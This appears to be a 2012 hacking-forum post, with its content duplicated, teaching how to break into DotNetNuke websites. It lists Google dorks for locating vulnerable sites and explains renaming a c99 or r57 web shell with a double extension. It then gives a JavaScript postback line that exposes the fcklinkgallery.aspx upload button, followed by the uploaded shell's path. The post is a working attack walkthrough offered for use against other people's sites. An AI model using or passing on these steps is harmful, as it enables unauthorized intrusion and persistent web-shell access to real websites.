DNN Exploit 11-08-2012, 09:25 AM
#1
DNN Exploit
In this tutorial I will write about hacking website via DNN(DotNetNuke) exploit. You will need shell (c99,r57, ItSecTeam Shell....)
What is DNN(DotNetNuke) ?
-http://www.dotnetnuke.com/
How to find vulnerable site ?
We will use GH(Google Hacking, Google Dorks)
Those are the dork I know and found if you what you can search in internet for more
Exploiting
http://www.site/home/tabid/36/language/e...fault.aspx
This is vulnerable site.
change home/tabid/36/language/en-US/default.aspx with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
The new page should look like this![[Image: image_thumb%5B18%5D.png]](http://lh4.ggpht.com/_dIvFa14S0yc/S4RrDarmmnI/AAAAAAAAJIY/EEVKeaQ_RQY/image_thumb%5B18%5D.png)
Rename your shell .jpge(example c99.asp.jpge)
Now select Third ratio "File (A file on Your Site)"
Paste this JavaScript in URL bar
Now you should see upload button click it
PARTY !@#!@$$%!@#%^! you have successful upload your shell
Here should it be 
Also sometimes you will see the page without the upload forum this site is NOT vulnerable
In this tutorial I will write about hacking website via DNN(DotNetNuke) exploit. You will need shell (c99,r57, ItSecTeam Shell....)
What is DNN(DotNetNuke) ?
Code:
DNN is the leading Web Content Management Platform (or CMS) for Microsoft, powering over 700,000 production web sites worldwide. The flexible DNN open source CMS platform also functions as a web application development framework. Depending on your role within your organization, DNN provides powerful benefits to support your Web initiatives.How to find vulnerable site ?
We will use GH(Google Hacking, Google Dorks)
Code:
inurl:/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
inurl:/portals/0Exploiting
http://www.site/home/tabid/36/language/e...fault.aspx
This is vulnerable site.
change home/tabid/36/language/en-US/default.aspx with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
The new page should look like this
Rename your shell .jpge(example c99.asp.jpge)
Now select Third ratio "File (A file on Your Site)"
Paste this JavaScript in URL bar
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')Now you should see upload button click it
PARTY !@#!@$$%!@#%^! you have successful upload your shell
Code:
portals/0/c99.asp.jpg
Also sometimes you will see the page without the upload forum this site is NOT vulnerable





![[+]](https://sinister.li/images/modern/collapse_collapsed.png)










![[Image: 7ajmN5P.jpg]](https://i.imgur.com/7ajmN5P.jpg)

